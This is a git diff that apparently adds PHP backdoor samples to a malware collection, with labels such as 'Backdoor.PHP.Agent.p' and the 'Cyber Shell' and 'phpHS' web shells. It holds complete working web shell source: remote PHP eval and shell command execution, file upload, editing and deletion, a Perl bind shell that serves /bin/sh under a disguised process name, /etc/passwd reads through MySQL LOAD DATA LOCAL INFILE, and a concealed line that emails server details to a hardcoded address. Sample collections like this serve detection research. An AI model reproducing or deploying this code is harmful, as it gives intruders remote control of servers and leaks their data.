    + + + + + + + +$tend +HTML; + +if (isset($_POST['ephp'])){ +eval($_POST['ephp']); +} +break; + + +//Text tools +case "tools": + +echo <<Tools +
    + + + + + + + + + +$tend +HTML; + +if (!empty($_POST['tot']) && !empty($_POST['tac'])) { + +switch($_POST['tac']) { + +case "1": +echo "Ðàñêîäèðîâàííûé òåêñò:" .base64_decode($_POST['tot']). ""; +break; + +case "2": +echo "Êîäèðîâàííûé òåêñò:" .base64_encode($_POST['tot']). ""; +break; + +case "3": +echo "Êîäèðîâàííûé òåêñò:" .md5($_POST['tot']). ""; +break; +}} +break; + + +// Uploading +case "upload": + +echo <<File Upload +
    +B64 Decode
    +B64 Encode

    +md5 Hash +
    + + + + + + + + + +$tend +HTML; + +if (isset($_POST['path'])){ + +$uploadfile = $_POST['path'].$_FILES['file']['name']; +if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} + +if (copy($_FILES['file']['tmp_name'], $uploadfile)) { + echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n"; + echo "Èìÿ:" .$_FILES['file']['name']. "\n"; + echo "Ðàçìåð:" .$_FILES['file']['size']. "\n"; + +} else { + print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n"; + print_r($_FILES); +} +} +break; + + +// Whois +case "whois": +echo <<Whois +
    Ôàéëî:
    Ïàïêà:
    + + + + + + + + + + + +$tend +HTML; + +if (isset($_POST['wq']) && $_POST['wq']<>"") { + +if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser']; + +$querty = $_POST['wq']."\r\n"; +$fp = fsockopen($wser, 43); + +if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else { +fputs($fp, $querty); +while(!feof($fp)){echo fgets($fp, 4000);} +fclose($fp); +}} +break; + + +} +?> + + + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.p b/PHP/Backdoor.PHP.Agent.p new file mode 100644 index 00000000..18e276e9 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.p @@ -0,0 +1,1033 @@ + +BODY, TD, TR { +text-decoration: none; +font-family: Verdana; +font-size: 8pt; +SCROLLBAR-FACE-COLOR: #363d4e; +SCROLLBAR-HIGHLIGHT-COLOR: #363d4e; +SCROLLBAR-SHADOW-COLOR: #363d4e; +SCROLLBAR-ARROW-COLOR: #363d4e; +SCROLLBAR-TRACK-COLOR: #91AAFF +} +input, textarea, select { +font-family: Verdana; +font-size: 10px; +color: black; +background-color: white; +border: solid 1px; +border-color: black +} +UNKNOWN { +COLOR: #0006DE; +TEXT-DECORATION: none +} +A:link { +COLOR: #0006DE; +TEXT-DECORATION: none +} +A:hover { +COLOR: #FF0C0B; +TEXT-DECORATION: none +} +A:active { +COLOR: #0006DE; +TEXT-DECORATION: none +} +A:visited { +TEXT-DECORATION: none +} +"; + +foreach($_POST as $key => $value) {$$key=$value;} +foreach($_GET as $key => $value) {$$key=$value;} + +if (isset($_GET[imgname])) +{ +$img=array( +'dir'=> +'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1mG6mv7ZbiBbxrhlUtJFMAiOVDbdjOAQAR26d880lzr2paU6T6hbp9gH+ulCKjJkqAQBK+4ZPPAqhDB4i0pXtbfRvtUYYFZluo0DAKq9Ccj7ufxqlq9n4p1qyksn0IQLKoQyNeRsF+dGzgdfu/rXi0ni4tJxZ2S9n3Vj/2Q==', +'txt'=> +'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1yy1G3sdEtDPDEIorCCRpXOOWGAMAHuPqc9K4bx5481Twp4c03xVolpaRjU3EM1rcozqzbSRINrLzhQAeMjGc4Xb1NpqOhTaXpznX9MgnS1hU754yyMq8YBbgjceoNeb/AB2u9IPw+0TT9M1K1uxbXaIBFOrsFETgE4NN8ttNyVe+ux//2Q==', +'bg'=> +'R0lGODlhCAAbAPQAAOTq8uLp8uDo8d7m8N3l79vj7tni7dfh7dXf7NTe69Pe69Ld6tLc6tDb6c7a6MzY6MrX58nW5sfU5cXT5MPS48PR48HQ4sLQ48DP4r/P4r7O4b7N4b3N4b3N4L3M4LzM4CwAAAAACAAbAAAFXCAgjmJgnqagrurgvi4hz3Jh37ah7/rh/z6EcChUGI8KhnK5aDae0KdjSp0+rtgrZMvdRr7gr2RMHk/O6HNlza5Y3nBLZk7PYO6bvH7z6fv3gBt1c3cYcW9tiRQhADs=', +'file'=> +'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrLnXbbSoILeLwJe6uyW8Baa0tWkDl4wxyQhAI4yCc/MDzzjITx9q+n3Go3VloUmjwRtbqbDUYHUsZBJh1XIwB5DcgDO85ztGNBtRjkaykiu9FdIFV4zJrcttIC1qsLhlSJsEc4YNuHYjJB5nXI0g0V1N/p0xLWsMMVrfG5ZUj+1MSSYowqjzlVVAwAoHHFXzQ5Lcvvd/L+vX16A91Y//Z', +); +@ob_clean(); +header("Content-type: image/gif"); +header("Cache-control: public"); +header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); +header("Cache-control: max-age=".(60*60*24*7)); +header("Last-Modified: ".date("r",filemtime(__FILE__))); +echo base64_decode($img[$imgname]); +die; +} + +if ($_GET[pass]==$aupassword) +{ +$_SESSION[aupass]=md5($aupassword); +} +if ($hiddenmode=="false") +if ((!isset($_GET[pass]) or ($_GET[pass]!=$aupassword)) and ($_SESSION[aupass]=="")) +{ +$diz="ok"; +echo " +$style















    + +
    Äîìåí:
    Õóéç ñåðâåð:
    + +
    + + + + + + + + + +
    +Enter your password: +
    + +
    + +
    + +"; +} +if ($_SESSION[aupass]!="") +{ +if (!$_GET and !$_POST or isset($pass)) +$show="start"; + +function ext($str){ +for ($i=1; $i",">",$str); +return $str; +} +function fsize($filename){ +$s=filesize($filename); +if ($s>1048576){ +return round(($s/1048576),2)." mb"; +} +if ($s>1024){ +return round(($s/1024),2)." kb"; +} +return $s." byte"; +} +function tourl($str){ +$str= urlencode($str); +return $str; +} +function unbug($str){ +$str = stripslashes($str); +return $str; +} +function countbyte($filesize) { +if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; } +elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; } +elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; } +else { $filesize = $filesize . ""; } +return $filesize; +} +function downloadfile($file) { +if (!file_exists("$file")) die; +$size = filesize("$file"); +$filen=extractfilename($file); +header("Content-Type: application/force-download; name=\"$filen\""); +header("Content-Transfer-Encoding: binary"); +header("Content-Length: $size"); +header("Content-Disposition: attachment; filename=\"$filen\""); +header("Expires: 0"); +header("Cache-Control: no-cache, must-revalidate"); +header("Pragma: no-cache"); +readfile("$file"); +die; +}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); + +function anonim_mail($from,$to,$subject,$text,$file){ + $fp = fopen($file, "rb"); + while(!feof($fp)) + $attachment .= fread($fp, 4096); + $attachment = base64_encode($attachment); + $subject = "sendfile (".extractfilename($file).")"; + $boundary = uniqid("NextPart_"); + $headers = "From: $from\nContent-type: multipart/mixed; boundary=\"$boundary\""; + $info = $text; + $filename=extractfilename($file); + $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filename \nContent-disposition: inline; filename=$filename \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--"; + $send = mail($to, $subject, $info, $headers); +fclose($fp); +echo ""; +die; +} +if (!empty($_GET[downloadfile])) downloadfile($_GET[downloadfile]); +if (!empty($_GET[mailfile])) anonim_mail($email,$email,$_GET[mailfile],'File: '.$_GET[mailfile],$_GET[mailfile]); + +$d=$_GET[d]; +if (empty($d) or !isset($d)){ +$d=realpath("./"); +$d=str_replace("\\","/",$d); +} +$showdir=""; +$bufdir=""; +$buf = explode("/", $d); +for ($i=0;$i$d + +$style + + + + + + + + + +
    +
    $showdir
    +EOF; + +function perms($file) +{ +$mode=fileperms($file); +if( $mode & 0x1000 ) +$type='p'; +else if( $mode & 0x2000 ) +$type='c'; +else if( $mode & 0x4000 ) +$type='d'; +else if( $mode & 0x6000 ) +$type='b'; +else if( $mode & 0x8000 ) +$type='-'; +else if( $mode & 0xA000 ) +$type='l'; +else if( $mode & 0xC000 ) +$type='s'; +else +$type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) +$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) +$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) +$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} + +function updir($dir){ +if (strlen($dir)>2){ +for ($i=1; $i +
    +Ââåðõ + +Íàçàä + + íà÷àëî + +Èíñòðóìåíòû + +Ê ñïèñêó +
    +EOF; + +$free = countbyte(diskfreespace("./")); +if (!empty($free)) echo "Äîñòóïíîå äèñêîâîå ïðîñòðàíñòâî : $free
    "; +$os=exec("uname"); +if (!empty($os)) echo "Ñèñòåìà :".$os."
    "; +if (!empty($REMOTE_ADDR)) echo "Âàø IP: $REMOTE_ADDR   $HTTP_X_FORWARDED_FOR
    "; +$ghz=exec("cat /proc/cpuinfo | grep GHz"); +if (!empty($ghz)) echo "Èíôà î æåëåçå:(GHz)".$ghz."
    "; +$mhz=exec("cat /proc/cpuinfo | grep MHz"); +if (!empty($mhz)) echo "Èíôà î æåëåçå:(MHz) ".$mhz."
    "; +$my_id=exec("id"); +if (!empty($my_id)) echo "
    Ïîëüçîâàòåëü:".$my_id."
    "; +} + +function showdir($df) { +$df=str_replace("//","/",$df); +$dirs=array(); +$files=array(); +if ($dir=opendir($df)) { +while (($file=readdir($dir))!==false) { +if ($file=="." || $file=="..") continue; +if (is_dir("$df/$file")){ +$dirs[]=$file;} +else { +$files[]=$file;}}} +closedir($dir); +sort($dirs); +sort($files); +echo <<< EOF + +EOF; +for ($i=0; $i + + + + + + +EOF; +} +for ($i=0; $i + + + + + + +EOF; +} +echo "
    $dirs[$i]Óäàëèòü
    Êàòàëîã
    $perm
    $files[$i] ($fsize)ren/del/get/mail
    $attr
    $perm
    "; +if (count($dirs)==0 && count($files)==0){ +echo <<< EOF + + + + +
    Ïàïêà ïóñòà
    +EOF; +}} + +$edit=$_REQUEST[edit]; +if (isset($_REQUEST[edit]) && (!empty($_REQUEST[edit])) && (!isset($_REQUEST[ashtml])) ){ +$file=fopen($edit,"r") or die ("Íåò äîñòóïà ê ôàéëó $edit"); +if (filesize($edit) > 0) +$tfile=fread($file,filesize($edit)) or die ("Íåò äîñòóïà ê ôàéëó $edit"); +else $tfile = ""; +fclose($file); +$tfile = htmlspecialchars($tfile,ENT_QUOTES); +echo " +
    +
    "; +$mydir=updir($edit); +echo " +Âåðíóòüñÿ ê $mydir/
    +Âû ðåäàêòèðóåòå ôàéë : $edit
    +Ïðîñìîòðåòü ýòîò ôàéë â âèäå HTML +
    + +
    +"; +if (!isset($_REQUEST[readonly])) +echo ""; +echo " +
    +
    +
    +"; +} +if (isset($edit) && (!empty($edit)) && (isset($ashtml))){ +$mydir=updir($edit); +echo " +
    +Âåðíóòüñÿ ê $mydir/
    +Âû ïðîñìàòðèâàåòå ôàéë : $edit +
    +"; +readfile($edit); +echo " +
    +
    +"; +} + +if (isset($texoffile) && isset($nameoffile)) +{ +$texoffile=unbug($texoffile); +$f = fopen("$nameoffile", "w") or die ("Íåò äîñòóïà ê ôàéëó $nameoffile"); +fwrite($f, "$texoffile"); +fclose($f); +$mydir=updir($nameoffile); +echo ""; +die; +} + +if (isset($_REQUEST[delfile]) && ($_REQUEST[delfile]!="")) +{ +$delfile=$_REQUEST[delfile]; +$mydir=updir($delfile); +$deleted = unlink("$delfile"); +echo ""; +die; +} + +function deletedir($directory) { +if ($dir=opendir($directory)) { +while (($file=readdir($dir))!==false) { +if ($file=="." || $file=="..") continue; +if (is_dir("$directory/$file")) { +deletedir($directory."/".$file);} +else {unlink($directory."/".$file);}}} +closedir($dir); +rmdir("$directory/$file"); +} +if (isset($_REQUEST[deldir]) && (!empty($_REQUEST[deldir]))){ +$deldir=$_REQUEST[deldir]; +$mydir=updir(updir($deldir)); +deletedir("$deldir"); +echo ""; +die; +} + +if (isset($show)){showdir("$d");} + +{ +if (isset($_REQUEST[tools])) +echo <<< EOF +
    + + + + +
    +.: Äåéñòâèÿ äëÿ äàííîé ïàïêè :. +
    +
    +EOF; +if (isset($_REQUEST[tools]) or isset($_REQUEST[tmkdir])) +echo <<< EOF +
    + + + + + + + +
    +
    +.: Ñîçäàòü ïàïêó :. +
    + + + + +
    +
    +EOF; + +if (isset($newdir) && ($newdir!="")) +{ +$mydir=updir($newdir); +mkdir($newdir,"7777"); +echo ""; +} + +if(@$_GET['rename']){ +echo "RENAME $d/$filetorename ?

    +
    +
    +RENAME
    $filetorename

    TO
    +

    + +
    +"; +@$rto=$_POST['rto']; +if($rto){ +$fr1=$d."/".$filetorename; +$fr1=str_replace("//","/",$fr1); +$to1=$d."/".$rto; +$to1=str_replace("//","/",$to1); +rename($fr1,$to1); +echo "File
    $filetorename
    Renamed to $rto

    "; +echo "";} +echo $copyr; +exit; +} + +if (isset($tools) or isset($tmkfile)) +echo <<< EOF +
    + + + + + + + +
    +
    +.: Ñîçäàòü ôàéë :. +
    + + + + +
    +
    +EOF; + +if (isset($newfile) && ($newfile!="")){ +$f = fopen("$newfile", "w+"); +fwrite($f, ""); +fclose($f); +$mydir=updir($newfile); +echo ""; +} + +if (isset($tools) or isset($tbackdoor)) +echo <<< EOF +
    + + + + + + + +
    +
    +.: Îòêðûòü ïîðò :. +
    +Èìÿ ñêðèïòà: Ïîðò: + + + + +
    +
    +EOF; + +if (isset($bfileneme) && ($bfileneme!="") && isset($bport) && ($bport!="")){ +$script=" +#!/usr/bin/perl +\$port = $bport; +\$port = \$ARGV[0] if \$ARGV[0]; +exit if fork; +\$0 = \"updatedb\" . \" \" x100; +\$SIG{CHLD} = 'IGNORE'; +use Socket; +socket(S, PF_INET, SOCK_STREAM, 0); +setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); +bind(S, sockaddr_in(\$port, INADDR_ANY)); +listen(S, 50); +while(1) +{ + accept(X, S); + unless(fork) + { + open STDIN, \"<&X\"; + open STDOUT, \">&X\"; + open STDERR, \">&X\"; + close X; + exec(\"/bin/sh\"); + } + close X; +} +"; + +$f = fopen("$d/$bfileneme", "w+"); +fwrite($f, $script); +fclose($f); +system("perl $d/$bfileneme"); +echo ""; +} + +if (isset($tools) or isset($tbash)) +echo <<< EOF +
    + + + + + + + +
    +
    + +.: Âûïîëíèòü êîìàíäó :. +
    + + + + + +
    +
    +EOF; + +if (isset($cmd) && ($cmd!="")){ +echo "
    "; +system($cmd); +echo "
    "; +} + +if (isset($tools) or isset($tupload)){ +$updir="$d/"; +if(empty($go)) { +echo <<< EOF +
    + + + + + + + +
    +
    +.: Çàêà÷àòü ôàéë â òåêóùèé êàòàëîã :. +
    + + + + + + +
    +
    +EOF; +} +else { +if (is_uploaded_file($userfile)) { +$fi = "Çàêà÷åí ôàéë $userfile_name ðàçìåðîì $userfile_size áàéò â äèðåêòîðèþ $updir"; +} +echo "$fi
    Íàçàä ê êàòàëîãó"; +} +if (is_uploaded_file($userfile)) { +$dest=$updir.$userfile_name; +move_uploaded_file($userfile, $dest); +}} + +if ((isset($db_server)) || (isset($db_user)) || (isset($db_pass)) ){ +mysql_connect($db_server, $db_user, $db_pass) or die("íå ìîãó ïîäêëþ÷èòüñÿ ê áàçå"); +} + +if ((isset($dbname)) and (isset($table)) ) +{ +foreach($_POST as $var => $val) +if (substr($var,0,7) == 'newpole'){ +if (substr($var,7,strlen($var)) !== ''){ +$indif=substr($var,7,strlen($var)); +echo " $val "; +mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ"); +if ($xvar == "") +$xvar .= $indif; +else +$xvar .= ",".$indif; +if ($xval == "") +$xval .= "'$val'"; +else +$xval .= ",'$val'"; +}} + +if ($xvar != ""){ +mysql_query("INSERT INTO $table ($xvar) values ($xval)"); +} + +echo "Íàçàä ê ñïèñêó òàáëèö ÁÄ:$dbname"; +mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ"); +$re=mysql_query("select * from $table"); +echo ""; + +$res=mysql_fetch_array($re); +echo ""; +if (count($res) > 1) +foreach($res as $var => $val){ +$nvar=$var; +if ($nvar !== 0) +$nvar=$var+128945432; +if ($nvar == 128945432){ +$var=untag($var); +echo ""; +}} +echo ""; + +if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0")) +$param="limit $_SESSION[limit]"; + +$re=mysql_query("select * from $table $param"); + +while($res=mysql_fetch_array($re)){ +echo ""; +if (count($res) > 1) +foreach($res as $var => $val){ +$nvar=$var; +if ($nvar !== 0) +$nvar=$var+128945432; +if (!$pixidname){ +$pixidname=$var; +$pixid=$val; +} +if ($nvar == 128945432){ +$valtext=untag($val); +if ($valtext == "") $valtext="=Ïóñòî="; + + +if ($_SESSION[lenth] == "on"){ +if (strlen($valtext)>40){ +$valtext=substr($valtext,0,40); +$valtext .="..."; +}} + +echo ""; +}} + +echo ""; +$pixidname=''; +$pixid=''; +} + +echo ""; + +$re=mysql_query("select * from $table"); +$res=mysql_fetch_array($re); +echo ""; +if (count($res) > 1) +foreach($res as $var => $val){ +$nvar=$var; +if ($nvar !== 0) +$nvar=$var+128945432; +if ($nvar == 128945432){ +$var=untag($var); +echo ""; +}} +echo ""; + +$re=mysql_query("select * from $table"); +$res=mysql_fetch_array($re); +echo ""; +if (count($res) > 1) +foreach($res as $var => $val){ +$nvar=$var; +if ($nvar !== 0) +$nvar=$var+128945432; +if ($nvar == 128945432){ +$var=untag($var); +echo ""; +}} +echo ""; +echo "
    $var
    $valtextÓäàëèòü
    $var
    "; +echo ""; +echo " + + + + + +"; +echo ""; +} + +if ((isset($dbname)) and (isset($mtable)) and (isset($pixidname)) and (isset($pixid)) and (isset($del))){ +echo "hello"; +mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ"); +mysql_query("delete from $mtable where $pixidname='$pixid'"); +echo ""; +} + +if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid)) and (isset($textofmysql))){ +mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ"); +mysql_query("update $mtable set $var='$textofmysql' where $pixidname=$pixid"); +} + +if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid))){ +mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ"); +$re=mysql_query("select $var from $mtable where $pixidname='$pixid'"); +$res=mysql_fetch_array($re); +$text=untag($res[$var]); + +echo " +
    + + + + + + + + + +
    +
    +Âåðíóòüñÿ ê ñïèñêó +"; +} + +if (isset($showdb) && empty($showtables)){ +$re=mysql_query("show databases"); +echo ""; +echo ""; +while($res=mysql_fetch_array($re)){ +echo ""; +} +echo "
    Ñïèñîê äîñòóïíûõ ÁÄ:
    $res[0]
    "; +} +if (isset($showtables) and !empty($showtables)){ + +if (isset($xlimit)){ +$_SESSION[limit]=$xlimit; +if (isset($xlenth)) +$_SESSION[lenth]=$xlenth; +else $_SESSION[lenth]=""; +} + +echo "Íàçàä ê ñïèñêó ÁÄ"; +$re=mysql_query("SHOW TABLES FROM $showtables"); +echo ""; +echo ""; +while($res=mysql_fetch_array($re)){ +echo ""; +} +echo "
    $showtables - Ñïèñîê òàáëèö:
    $res[0]
    "; + +if (($_SESSION[lenth]) == "on") +$ch="checked"; +else +$ch=""; + +echo <<< EOF +
    + + + + +îãðàíè÷åíèå íà êîëè÷åñòâî âûâîäèìûõ ïîëåé:
    + +
    Âêëþ÷èòü îãðàíè÷åíèå íà äëèíó âûâîäèìûõ ïîëåé
    + +EOF; +if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0")) +echo "
    Òåêóùåå îãðàíè÷åíèå: $_SESSION[limit]"; +} + +if (isset($tools) or isset($tmysql)) +echo " +
    + + + + + + + +
    +.: MySQL :. +
    + + + + + + + + + + + + + + + + + + + + + +
    +Host + + +
    +Login MySQL + + +
    +Password MySQL + + + +
    +Èìÿ ÁÄ (íå îáÿçàòåëüíî) + + +
    + + + +
    + +
    +
    +"; +} +echo <<< EOF +
    .:Cyber Shell (v 1.0):.
    Copyright © Cyber Lords Community, 2002-2006
    + + + +EOF; + +$d=tourl($d); +echo " +
    + +.: Ñîçäàòü ïàïêó :. +.: Ñîçäàòü ôàéë :. +.: Îòêðûòü ïîðò äëÿ ïîäêëþ÷åíèÿ :.
    +.: Bash :. +.: Çàêà÷àòü ôàéë :. +
    +
    +"; +} +die; +?> diff --git a/PHP/Backdoor.PHP.Agent.r b/PHP/Backdoor.PHP.Agent.r new file mode 100644 index 00000000..4c4cc993 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.r @@ -0,0 +1,1231 @@ + + + + +:: phpHS :: PHP HVA Shell Script :: + + text="#CCCCCC" link="#CCCCCC" vlink="#CCCCCC" alink="#CCCCCC"> +"; + if ($mysql_use!="no") { + $phpcheck = new php_check($mhost, $muser, $mpass, $mdb); + } else { $phpcheck = new php_check(); } + echo "
    "; + } + if ($action=="mysqlread") { + // $file + + if (!$file) { $file = "/etc/passwd"; } + ?> + +
    + + [ load all defaults ] +
    + "; + // regular LOAD DATA LOCAL INFILE + if (!$mass) { + $sql = array ( + "USE $mdb", + + 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)', + + "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS " + . "TERMINATED BY '__THIS_NEVER_HAPPENS__' " + . "ESCAPED BY '' " + . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", + + "SELECT a FROM $tbl LIMIT 1" + ); + + + mysql_connect ($mhost, $muser, $mpass); + + foreach ($sql as $statement) { + $q = mysql_query ($statement); + + if ($q == false) die ( + "FAILED: " . $statement . "\n" . + "REASON: " . mysql_error () . "\n" + ); + + if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue; + + echo htmlspecialchars($r[0]); + mysql_free_result ($q); + } + } + + if ($mass) { + $file = "/etc/passwd"; + $sql = array (); + $cp = mysql_connect ($mhost, $muser, $mpass); + mysql_select_db($mdb); + $tbl = "xploit"; + mysql_query("CREATE TABLE `xploit` (`xploit` LONGBLOB NOT NULL)"); + for($i=0;count($mysql_files)>$i;$i++) { + mysql_query("LOAD DATA LOCAL INFILE '".$mysql_files[$i]."' INTO TABLE ".$tbl." FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'"); + } + $q = mysql_query("SELECT * FROM ".$tbl.""); + while ($arr = mysql_fetch_array($q)) { + echo $arr[0]."\n"; + } + mysql_query("DELETE FROM ".$tbl.""); + mysql_query("DROP TABLE ".$tbl.""); + + } + echo ""; + } + if ($action=="read") { + if (!$method) { $method="file"; } + if (!$file) { $file = "/etc/passwd"; } + ?> +
    +
    + + + +
    +
    "; + foreach ($filer as $a) { echo $a; } + echo ""; + } else { + echo ""; + } + } + if ($method=="fread") { + if (@fopen($file, 'r')) { + $fp = fopen($file, 'r'); + $string = fread($fp, filesize($file)); + echo "
    ";
    +                echo $string;
    +                echo "
    "; + } else { + echo ""; + } + } + if ($method=="show_source") { + if (show_source($file)) { + //echo "
    ";
    +                //echo show_source($file);
    +                //echo "
    "; + } else { + echo ""; + } + + } + if ($method=="readfile") { + echo "
    ";
    +            if (readfile($file)) {
    +                //echo "
    ";
    +                //echo readfile($file);
    +                echo "
    "; + } else { + echo "
